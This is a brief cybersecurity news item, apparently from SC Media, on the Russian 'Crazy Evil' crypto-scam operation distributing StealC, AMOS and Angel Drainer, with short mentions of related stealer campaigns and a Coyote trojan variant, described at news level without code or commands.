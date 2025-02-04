Malware, Threat Intelligence

Numerous malware deployed by crypto-targeting Crazy Evil operation

cyber crime assessment , security awareness , malware detection
(Adobe Stock)

Attacks deploying the StealC, Atomic macOS Stealer, and Angel Drainer payloads have been deployed by Russian cybercrime operation Crazy Evil as part of its more than 10 ongoing scam campaigns aimed at facilitating cryptocurrency and other digital asset compromise in Windows and macOS systems, according to The Hacker News.

Aside from being composed of half a dozen sub-teams distributing the StealC and AMOS stealers masquerading as WeChat, Zoom, Selenium Finance, and other platforms, Crazy Evil — which initially operated as a traffer network that sought to redirect legitimate traffic to phishing sites — also sought to provide crypter services for various malware, a report from Recorded Future's Insikt Group revealed. Such findings come as the Insikt Group detailed the TAG-124 traffic distribution system leveraged by the Rhysida and Interlock ransomware operations, among others. Meanwhile, malicious GitHub-hosted installers were reported by Trend Micro researchers to have been leveraged to enable the spread of the Lumma Stealer, Vidar Stealer, SectopRAT, and Cobalt Strike beacon.

Related

Updated Coyote malware facilitates more extensive compromise

Attacks with the new Coyote trojan variant over the past month involved the deployment of an LNK file executing a PowerShell command facilitating next-stage PowerShell script retrieval for the eventual launching of the trojan, which not only obtained system details and an antivirus product list but also sought to bypass sandbox discovery, according to a Fortinet FortiGuard Labs study.

Related Events

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

CorruptionDNS SpoofingDeauthentication AttackDictionary AttackDomain HijackingDrive-by DownloadDumpSecGoogle HackingHybrid AttackMorris Worm

You can skip this ad in 5 seconds